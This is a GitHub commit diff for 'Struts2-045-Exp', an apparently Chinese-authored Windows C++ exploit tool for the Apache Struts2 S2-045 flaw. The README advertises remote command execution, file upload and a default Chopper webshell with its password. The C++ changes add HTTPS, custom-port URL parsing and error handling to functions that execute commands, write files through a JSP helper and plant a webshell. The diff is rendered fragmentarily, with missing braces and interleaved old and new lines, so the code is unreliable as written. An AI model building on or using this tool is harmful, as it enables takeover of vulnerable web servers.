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version 0.3 Support HTTP/HTTPS and URL With Any Port
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Flyteas committed Mar 11, 2017
1 parent ca68d04 commit d7ff3a2
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Showing 5 changed files with 123 additions and 26 deletions.
2 changes: 2 additions & 0 deletions
Expand Up @@ -7,6 +7,8 @@
- File Upload
- Getshell
- Default Webshell For Chopper
- Support HTTP/HTTPS
- Support URL With Any Port
- Note: Default Webshell's Password is s2045@exp

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Binary file modified Struts2-045-Exp.v11.suo
Binary file not shown.
144 changes: 119 additions & 25 deletions Struts2-045-Exp/Exp.cpp
@@ -1,10 +1,11 @@
#include "stdafx.h"
#include "Exp.h"
#include <winsock2.h>
#include <atlbase.h>
#include <atlconv.h>
#include <stdio.h>
#include <afxinet.h>
#include <regex>
#include "Exp.h"

Expand Down Expand Up @@ -58,7 +59,12 @@ CString Exp::executeCommand(CString url,CString command)
CString statusCodeStr;
statusCodeStr.Format("%d", statusCode);
exeResult = "执行失败,HTTP状态码为 " + statusCodeStr;
if(statusCode == -1) //URL错误
exeResult = "输入的URL不正确!\n请输入正确的URL";
else if(statusCode == 0) //HTTP请求出错
exeResult = "HTTP请求出错!\n请检查与服务器网络是否联通";
exeResult = "执行失败,HTTP状态码为 " + statusCodeStr;
return exeResult;
Expand All @@ -78,8 +84,13 @@ CString Exp::getRootPath(CString url,DWORD& statusCode)
if(statusCode != 200) //状态码不是200
CString statusCodeStr;
statusCodeStr.Format("%d", statusCode);
pathResult = "获取网站根目录失败,HTTP状态码为 " + statusCodeStr;
statusCodeStr.Format("%d", statusCode);
if(statusCode == -1) //URL错误
pathResult = "输入的URL不正确!\n请输入正确的URL";
else if(statusCode == 0) //HTTP请求出错
pathResult = "HTTP请求出错!\n请检查与服务器网络是否联通";
pathResult = "获取网站根目录失败,HTTP状态码为 " + statusCodeStr;
return pathResult;
Expand Down Expand Up @@ -110,7 +121,12 @@ CString Exp::writeFile(CString url,CString filePath,CString writeData)
CString statusCodeStr;
statusCodeStr.Format("%d", statusCode);
writeResult = "写入文件失败,HTTP状态码为 " + statusCodeStr;
if(statusCode == -1) //URL错误
writeResult = "输入的URL不正确!\n请输入正确的URL";
else if(statusCode == 0) //HTTP请求出错
writeResult = "HTTP请求出错!\n请检查与服务器网络是否联通";
writeResult = "写入文件失败,HTTP状态码为 " + statusCodeStr;
return writeResult;
/* 通过JSP写文件助手上传文件到服务器 */
Expand All @@ -136,8 +152,13 @@ CString Exp::writeFile(CString url,CString filePath,CString writeData)
if(writeResult.Mid(0,4) != "0x00") //并且返回页面前4个字符不是 0x00 则说明JSP助手写文件失败
CString statusCodeStr;
statusCodeStr.Format("%d", statusCode);
writeResult = "写入文件失败,HTTP状态码为 " + statusCodeStr;
statusCodeStr.Format("%d", statusCode);
if(statusCode == -1) //URL错误
writeResult = "输入的URL不正确!\n请输入正确的URL";
else if(statusCode == 0) //HTTP请求出错
writeResult = "HTTP请求出错!\n请检查与服务器网络是否联通";
writeResult = "写入文件失败,HTTP状态码为 " + statusCodeStr;
return writeResult;
writeResult = "写入文件成功!\n路径: " + filePath;
Expand All @@ -150,7 +171,7 @@ CString Exp::getShell(CString url,CString shellName,CString shellData)
if(getshellResult.Find("成功") != -1) //GETSHELL成功
getshellResult = "Getshell 成功!\n请访问应用根目录下的Webshell: " + shellName;
else //失败
getshellResult = "Getshell 失败!";
getshellResult = "Getshell 失败!\n" + getshellResult;
return getshellResult;

Expand Down Expand Up @@ -196,32 +217,40 @@ CString Exp::getShell(CString url,CString shellName,CString shellData)
//POST请求,返回请求页面结果,statusCode为返回的HTTP状态码 timeout为超时时间 retryTime重试次数 retryDelay重试间隔时间
CString Exp::httpPost(CString url,CString header,CString postData,DWORD& statusCode,DWORD timeout,DWORD retryTime,DWORD retryDelay)
CString urlHost = ""; //主机
CString urlPath = ""; //路径
int urlType; //http类型 0 http 1 https
CString urlHost; //主机
INTERNET_PORT urlPort; //端口号
CString urlPath; //路径
CString resultPage = ""; //返回页面

/* URL解析 */
CString urlPrefix = "http://"; //URL前缀
CString urlSeparator = "/"; //URL分隔符
int urlPrefixPos = url.Find(urlPrefix); //查找第一个前缀位置
if(urlPrefixPos >= 0) //存在前缀
url = url.Mid(urlPrefixPos+urlPrefix.GetLength()); //去除前缀
int urlSeparatorPos = url.Find(urlSeparator); //查找第一个分隔符位置
if(urlSeparatorPos >= 0) //存在分隔符
if(!urlParse(url,urlType,urlHost,urlPort,urlPath)) //URL不正确
urlHost = url.Mid(0,urlSeparatorPos); //取主机名
urlPath = url.Mid(urlSeparatorPos); //取路径 包括分隔符
statusCode = -1;
return resultPage;
else //不存在分隔符
urlHost = url; //取主机名
CInternetSession httpSession;
httpSession.SetOption(INTERNET_OPTION_CONNECT_TIMEOUT,timeout); //超时时间
httpSession.SetOption(INTERNET_OPTION_CONNECT_BACKOFF,retryDelay); // 重试间隔时间
httpSession.SetOption(INTERNET_OPTION_CONNECT_RETRIES,retryTime); //重试次数
CHttpConnection* HttpConnection = httpSession.GetHttpConnection(urlHost);
DWORD httpFlags;
CHttpConnection* httpConnection;
CHttpFile* httpFile;
if(urlType == 1) //https类型的URL
httpConnection = httpSession.GetHttpConnection(urlHost,INTERNET_FLAG_SECURE,443); //设置为HTTPS
httpFile->QueryOption(INTERNET_OPTION_SECURITY_FLAGS, httpFlags);
httpFile->SetOption(INTERNET_OPTION_SECURITY_FLAGS, httpFlags);
else //http类型的URL
httpConnection = httpSession.GetHttpConnection(urlHost,urlPort);
if(statusCode != 200)
Expand All @@ -241,4 +270,69 @@ CString Exp::httpPost(CString url,CString header,CString postData,DWORD& statusC
statusCode = 0;
return resultPage;

/* URL解析 匹配正则表达式为 ((http|https)://)(([a-zA-Z0-9\._-]+\.[a-zA-Z]{2,6})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(:[0-9]{1,4})*(/[a-zA-Z0-9\&%_\./-~-]*)? */
bool Exp::urlParse(CString url,int&httpType,CString& host,unsigned short int& port,CString& path)
CString httpPrefix = "http://";
CString httpsPrefix = "https://";
CString httpRegEx = "((http|https)://)(([a-zA-Z0-9\\._-]+\\.[a-zA-Z]{2,6})|([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}))(:[0-9]{1,4})*(/[a-zA-Z0-9\\&%_\\./-~-]*)?"; //URL匹配正则表达式
url.Replace("\\","/"); //反斜杠换成斜杠
if(url.Mid(0,httpPrefix.GetLength()) != httpPrefix && url.Mid(0,httpsPrefix.GetLength()) != httpsPrefix) //输入的URL没有前缀
url = "http://" + url; //添加前缀
else //统一将前缀换成小写
url = url.Mid(0,5).MakeLower() + url.Mid(5);
std::string urlRegExStr(httpRegEx.GetBuffer());
std::string urlStr(url.GetBuffer());
std::regex regexPat(urlRegExStr);
if(!std::regex_match(urlStr,regexPat)) //正则匹配失败
return false;
if(url.Mid(0,httpPrefix.GetLength()) == httpPrefix) //http类型
httpType = 0;
url = url.Mid(httpPrefix.GetLength()); //去除前缀
else if(url.Mid(0,httpsPrefix.GetLength()) == httpsPrefix) //https类型
httpType = 1;
url = url.Mid(httpsPrefix.GetLength()); //去除前缀
return false;
CString urlSeparator = "/"; //URL分隔符
CString urlPortSeparator = ":"; //端口号分隔符号
int urlSeparatorPos = url.Find(urlSeparator); //第一个分隔符位置
int urlPortSeparatorPos = url.Find(urlPortSeparator); //第一个端口号分隔符位置
if(urlSeparatorPos == -1 && urlPortSeparatorPos == -1) //均不存在
host = url;
port = 80;
path = "";
else if(urlPortSeparatorPos != -1 && urlSeparatorPos == -1) //存在端口号不存在分隔符
host = url.Mid(0,urlPortSeparatorPos);
port = atoi(url.Mid(urlPortSeparatorPos+1));
path = "";
else if(urlPortSeparatorPos == -1 && urlSeparatorPos != -1) //存在分隔符不存在端口号
host = url.Mid(0,urlSeparatorPos);
port = 80;
path = url.Mid(urlSeparatorPos); //路径包含第一个分隔符
else //均存在
if(urlPortSeparatorPos >= urlSeparatorPos) //URL错误
return false;
host = url.Mid(0,urlPortSeparatorPos);
int portLen = urlSeparatorPos-urlPortSeparatorPos-1;
if(portLen > 0)
port = atoi(url.Mid(urlPortSeparatorPos+1,portLen));
port = 80;
path = url.Mid(urlSeparatorPos); //路径包含第一个分隔符
return true;
3 changes: 2 additions & 1 deletion Struts2-045-Exp/Exp.h
Expand Up @@ -9,7 +9,8 @@ class Exp
CString writeFile(CString url,CString filePath,CString writeData); //写文件
CString getShell(CString url,CString shellName,CString shellData); //Getshell shell在根目录
CString httpPost(CString url,CString header,CString postData,DWORD& statusCode,DWORD timeout,DWORD retryTime,DWORD retryDelay); //POST请求,返回请求页面结果,statusCode为返回的HTTP状态码
CString httpPost(CString url,CString header,CString postData,DWORD& statusCode,DWORD timeout,DWORD retryTime,DWORD retryDelay); //POST请求,返回请求页面结果,statusCode为状态码 -1表示URL错误 0表示Http请求错误 其他表示HTTP状态码
bool urlParse(CString url,int&httpType,CString& host,unsigned short int& port,CString& path); //URL解析,解析后得到 HTTP类型(httpType):0为Http 1为Https host 主机名 port端口号 path访问路径 不正确URL返回FALSE
CString urlEncode(CString strData,int srcCodepage, int dstCodepage); //URL编码 srcCodepage原类型 dstCodepage转换后的类型
CString urlEncodeCore(CString strData,int srcCodepage, int dstCodepage); //URL编码核心实现 srcCodepage原类型 dstCodepage转换后的类型
CString writeJspHelperCode; //JSP写文件代码
Expand Down
Binary file modified Struts2-045-Exp/resource.h
Binary file not shown.

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